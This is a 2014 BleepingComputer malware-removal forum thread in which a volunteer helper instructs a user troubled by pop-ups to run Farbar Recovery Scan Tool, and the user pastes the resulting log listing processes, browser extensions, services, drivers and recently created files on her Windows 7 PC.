Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

contending with contant pop-ups, and interference whilst using the internet


  • This topic is locked This topic is locked
20 replies to this topic

#1 Paulie67

Paulie67

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 16 March 2014 - 10:37 PM

Hi, I have performed the adwclean by xplode and copy and pasted the repot, followd by junkware removal then also copy and pasted, saving the report.. still having problems??

uuurgghhhh...

 

would combofix be the next consideration??



BC AdBot (Login to Remove)

 


#2 gringo_pr

gringo_pr

    Bleepin Gringo


  • Malware Response Team
  • 136,772 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Puerto rico
  • Local time:03:21 PM

Posted 17 March 2014 - 07:20 AM





Hello Paulie67

I would like to welcome you to the Malware Removal section of the forum.

Around here they call me Gringo and I will be glad to help you with your malware problems.

Very Important --> Please read this post completely, I have spent my time to put together somethings for you to keep in mind while I am helping you to make things go easier, faster and smoother for both of us!

  • Please do not run any tools unless instructed to do so.
    • We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
  • Please do not attach logs or use code boxes, just copy and paste the text.
    • Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.
  • Please read every post completely before doing anything.
    • Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.
  • Please provide feedback about your experience as we go.
    • A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.
NOTE: At the top of your post, click on the "Follow This Topic" Button, make sure that the "Receive notification" box is checked and that it is set to "Instantly" - This will send you an e-mail as soon as I reply to your topic, allowing us to resolve the issue faster.

NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planed. You can put them on a CD/DVD, external drive or a pen drive, anywhere except on the computer.

NOTE: It is good practice to copy and paste the instructions into notepad and print them in case it is necessary for you to go offline during the cleanup process. To open notepad, navigate to Start Menu > All Programs > Accessories > Notepad. Please remember to copy the entire post so you do not miss any instructions.

I would like you to run this program for me.

Please download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.
Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#3 Paulie67

Paulie67
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Sunshine Coast, QLD
  • Local time:05:21 AM

Posted 18 March 2014 - 09:45 AM

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 13-03-2014
Ran by Paulette (administrator) on PAULETTE-PC on 19-03-2014 00:41:22
Running from C:\Users\Paulette\Desktop
Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
(AMD) C:\Windows\system32\atiesrxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AMD) C:\Windows\system32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
(ABBYY) C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50STB.EXE
(SEIKO EPSON CORPORATION) C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
(Hewlett-Packard Company) c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(AVG) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Virtualization Handler\CVHSVC.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
(AVG) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgui.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems, Inc.) C:\Windows\SysWow64\Macromed\Flash\FlashUtil10c.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe

==================== Registry (Whitelisted) ==================

HKLM-x32\...\Run: [StartCCC] - C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2009-09-08] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [] - [X]
HKLM-x32\...\Run: [AVG_UI] - C:\Program Files (x86)\AVG\AVG2014\avgui.exe [4956176 2013-11-07] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [APSDaemon] - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [EEventManager] - C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [976320 2009-12-03] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [AvastUI.exe] - C:\Program Files\AVAST Software\Avast\AvastUI.exe [3767096 2014-03-16] (AVAST Software)
HKU\.DEFAULT\...\RunOnce: [SPReview] - C:\Windows\System32\SPReview\SPReview.exe [301568 2014-01-26] (Microsoft Corporation)
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.jp.msn.com/CQALL/13
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://g.jp.msn.com/CQALL/13
HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages =
StartMenuInternet: IEXPLORE.EXE - c:\program files (x86)\internet explorer\iexplore.exe
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
BHO-x32: Bizzybolt - {13070af0-bc6c-4185-8baa-40a4cf05b323} -  No File
BHO-x32: Media Player - {497c088e-1b2a-43fe-8431-d5d257f37546} -  No File
BHO-x32: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Bing Bar Helper - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
Toolbar: HKLM - avast! Online Security - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - avast! Online Security - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1

FireFox:
========
FF ProfilePath: C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default
FF NewTab: hxxp://www.google.com/firefox
FF SearchEngineOrder.1: Google
FF SelectedSearchEngine: Google
FF Homepage: hxxp://www.google.com/firefox
FF Keyword.URL: hxxp://www.google.com/search?ie=UTF-8&oe=utf-8&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_12_0_0_77.dll ()
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_12_0_0_77.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\SysWOW64\Adobe\Director\np32dsw_1207148.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Extension: deeal4meu - C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\Extensions\kf@hprqfobf.co.uk [2014-02-15]
FF Extension: PsdChheckeer - C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\Extensions\pcuoiu@ho-eqn.co.uk [2014-02-15]
FF Extension: Address Bar Search - C:\Users\Paulette\AppData\Roaming\Mozilla\Firefox\Profiles\c6yb3sta.default\Extensions\{badea1ae-72ed-4f6a-8c37-4db9a4ac7bc9}.xpi [2014-01-26]
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaPlayerV1alpha8359.net] - C:\Program Files (x86)\MediaPlayerV1\MediaPlayerV1alpha8359\ff
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaViewerV1alpha1544.net] - C:\Program Files (x86)\MediaViewerV1\MediaViewerV1alpha1544\ff
FF Extension: Media Viewer - C:\Program Files (x86)\MediaViewerV1\MediaViewerV1alpha1544\ff [2014-02-25]
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaViewV1alpha1750.net] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha1750\ff
FF Extension: Media View - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha1750\ff [2014-02-28]
FF HKLM-x32\...\Firefox\Extensions: [ext@MediaViewV1alpha5390.net] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha5390\ff
FF Extension: Media View - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha5390\ff [2014-03-16]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-03-16]

Chrome:
=======
CHR RestoreOnStartup: "hxxp://www.google.com/"
CHR DefaultSearchKeyword: google.com.au
CHR Extension: (Google Docs) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-01-20]
CHR Extension: (Google Drive) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-01-20]
CHR Extension: (YouTube) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-01-20]
CHR Extension: (Google Search) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-01-20]
CHR Extension: (No Name) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkcefkcdkepgkpbgncjchhbjgoanleod [2014-01-20]
CHR Extension: (Google Wallet) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-01-20]
CHR Extension: (Gmail) - C:\Users\Paulette\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-01-20]
CHR HKLM-x32\...\Chrome\Extension: [anapdnpmolnfpoanicpbhbkjdanalhli] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha5390\ch\MediaViewV1alpha5390.crx [2014-02-27]
CHR HKLM-x32\...\Chrome\Extension: [fgbdmiloaeojcpapinhpkaofnhakoeef] - C:\Program Files (x86)\MediaViewerV1\MediaViewerV1alpha1544\ch\MediaViewerV1alpha1544.crx [2014-02-23]
CHR HKLM-x32\...\Chrome\Extension: [fonpkfofimgikimaalgagbgajpdfciio] - C:\Program Files (x86)\MediaViewV1\MediaViewV1alpha1750\ch\MediaViewV1alpha1750.crx [2014-02-27]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-03-16]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Services (Whitelisted) =================

R2 ABBYY.Licensing.FineReader.Sprint.9.0; C:\Program Files (x86)\Common Files\ABBYY\FineReaderSprint\9.00\Licensing\NetworkLicenseServer.exe [759048 2009-05-14] (ABBYY)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-03-16] (AVAST Software)
R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [113704 2014-03-16] (AVAST Software)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe [3478544 2013-11-11] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe [348008 2013-09-24] (AVG Technologies CZ, s.r.o.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [418376 2013-04-04] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [701512 2013-04-04] (Malwarebytes Corporation)
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [2102072 2013-12-18] (AVG)

==================== Drivers (Whitelisted) ====================

U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
R1 aswKbd; C:\Windows\system32\drivers\aswKbd.sys [28184 2014-03-16] (AVAST Software)
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [78648 2014-03-16] (AVAST Software)
R1 aswNdisFlt; C:\Windows\System32\DRIVERS\aswNdisFlt.sys [440672 2014-03-16] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [92544 2014-03-16] (AVAST Software)
R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-03-16] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1038072 2014-03-16] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [421704 2014-03-16] (AVAST Software)
R3 aswStm; C:\Windows\system32\drivers\aswStm.sys [80184 2014-03-16] (AVAST Software)
R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [207904 2014-03-16] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [150808 2013-11-05] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [240920 2013-11-04] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [194872 2013-10-24] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [212280 2013-10-31] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [294712 2013-10-31] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123704 2013-10-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31544 2013-09-10] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [251192 2013-08-01] (AVG Technologies CZ, s.r.o.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25928 2013-04-04] (Malwarebytes Corporation)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [14112 2013-12-16] (TuneUp Software)
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]

==================== NetSvcs (Whitelisted) ===================

==================== One Month Created Files and Folders ========

2014-03-19 00:41 - 2014-03-19 00:42 - 00015656 _____ () C:\Users\Paulette\Desktop\FRST.txt
2014-03-19 00:41 - 2014-03-19 00:41 - 00000000 ____D () C:\FRST
2014-03-19 00:39 - 2014-03-19 00:40 - 02157056 _____ (Farbar) C:\Users\Paulette\Desktop\FRST64.exe
2014-03-19 00:37 - 2014-03-19 00:37 - 01145856 _____ (Farbar) C:\Users\Paulette\Desktop\FRST.exe
2014-03-17 13:21 - 2014-03-17 13:21 - 00001984 _____ () C:\Users\Paulette\Desktop\JRT.txt
2014-03-17 13:09 - 2014-03-17 13:09 - 00000000 ____D () C:\Windows\ERUNT
2014-03-17 13:02 - 2014-03-17 13:02 - 01037734 _____ (Thisisu) C:\Users\Paulette\Downloads\JRT.exe
2014-03-17 12:39 - 2014-03-17 12:43 - 00000000 ____D () C:\AdwCleaner
2014-03-17 12:37 - 2014-03-17 12:39 - 01950720 _____ () C:\Users\Paulette\Downloads\AdwCleaner.exe
2014-03-17 11:40 - 2014-03-19 00:22 - 00000224 _____ () C:\Windows\setupact.log
2014-03-17 11:40 - 2014-03-17 11:40 - 00028918 _____ () C:\Windows\PFRO.log
2014-03-17 11:40 - 2014-03-17 11:40 - 00000000 _____ () C:\Windows\setuperr.log
2014-03-17 11:13 - 2014-03-17 11:40 - 00000470 _____ () C:\Windows\Tasks\SparkTrust Registration3.job
2014-03-17 11:13 - 2014-03-17 11:13 - 00003140 _____ () C:\Windows\System32\Tasks\SparkTrust Registration3
2014-03-17 11:12 - 2014-03-19 00:23 - 00000480 _____ () C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job
2014-03-17 11:12 - 2014-03-17 11:40 - 00000651 _____ () C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job
2014-03-17 11:12 - 2014-03-17 11:40 - 00000428 _____ () C:\Windows\Tasks\SparkTrust Update Version3.job
2014-03-17 11:12 - 2014-03-17 11:12 - 00004096 _____ () C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E
2014-03-17 11:12 - 2014-03-17 11:12 - 00003248 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3
2014-03-17 11:12 - 2014-03-17 11:12 - 00002912 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task
2014-03-16 15:22 - 2014-03-17 13:25 - 00002192 _____ () C:\Users\Public\Desktop\avast! Premier.lnk
2014-03-16 15:22 - 2014-03-16 15:22 - 00440672 _____ (AVAST Software) C:\Windows\system32\Drivers\aswndisflt.sys
2014-03-16 15:22 - 2014-03-16 15:22 - 00002018 _____ () C:\Users\Public\Desktop\avast! SafeZone.lnk
2014-03-16 15:21 - 2014-03-18 23:32 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-03-16 15:19 - 2014-03-16 15:19 - 00000000 ____D () C:\Users\Paulette\AppData\Roaming\AVAST Software
2014-03-16 09:06 - 2014-03-16 09:06 - 01038072 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00421704 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00334136 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-03-16 09:06 - 2014-03-16 09:06 - 00207904 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00092544 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00080184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00078648 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-03-16 09:06 - 2014-03-16 09:06 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-03-16 09:06 - 2014-03-16 09:06 - 00028184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswKbd.sys
2014-03-16 09:05 - 2014-03-16 09:05 - 00000000 ____D () C:\Program Files\AVAST Software
2014-03-16 09:02 - 2014-03-16 09:02 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-03-16 08:49 - 2014-03-16 08:59 - 123721288 _____ (AVAST Software) C:\Users\Paulette\Downloads\avast_premier_antivirus_setup.exe
2014-03-16 08:49 - 2014-03-16 08:49 - 00001727 _____ () C:\Users\Paulette\Downloads\License(1).avastlic
2014-03-13 09:03 - 2014-03-01 16:05 - 23133696 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-03-13 09:03 - 2014-03-01 15:17 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-03-13 09:03 - 2014-03-01 15:16 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-03-13 09:03 - 2014-03-01 14:58 - 02765824 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-03-13 09:03 - 2014-03-01 14:52 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-03-13 09:03 - 2014-03-01 14:51 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-03-13 09:03 - 2014-03-01 14:42 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-03-13 09:03 - 2014-03-01 14:40 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-03-13 09:03 - 2014-03-01 14:37 - 00574976 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-03-13 09:03 - 2014-03-01 14:33 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-03-13 09:03 - 2014-03-01 14:33 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-03-13 09:03 - 2014-03-01 14:32 - 00708608 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-03-13 09:03 - 2014-03-01 14:30 - 17074688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-03-13 09:03 - 2014-03-01 14:23 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-03-13 09:03 - 2014-03-01 14:17 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-03-13 09:03 - 2014-03-01 14:11 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-03-13 09:03 - 2014-03-01 14:02 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-03-13 09:03 - 2014-03-01 13:54 - 05768704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-03-13 09:03 - 2014-03-01 13:52 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-03-13 09:03 - 2014-03-01 13:51 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-03-13 09:03 - 2014-03-01 13:47 - 02168320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-03-13 09:03 - 2014-03-01 13:43 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-03-13 09:03 - 2014-03-01 13:43 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-03-13 09:03 - 2014-03-01 13:42 - 00627200 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-03-13 09:03 - 2014-03-01 13:40 - 00440832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-03-13 09:03 - 2014-03-01 13:38 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-03-13 09:03 - 2014-03-01 13:37 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-03-13 09:03 - 2014-03-01 13:35 - 02041856 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-03-13 09:03 - 2014-03-01 13:18 - 13051904 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
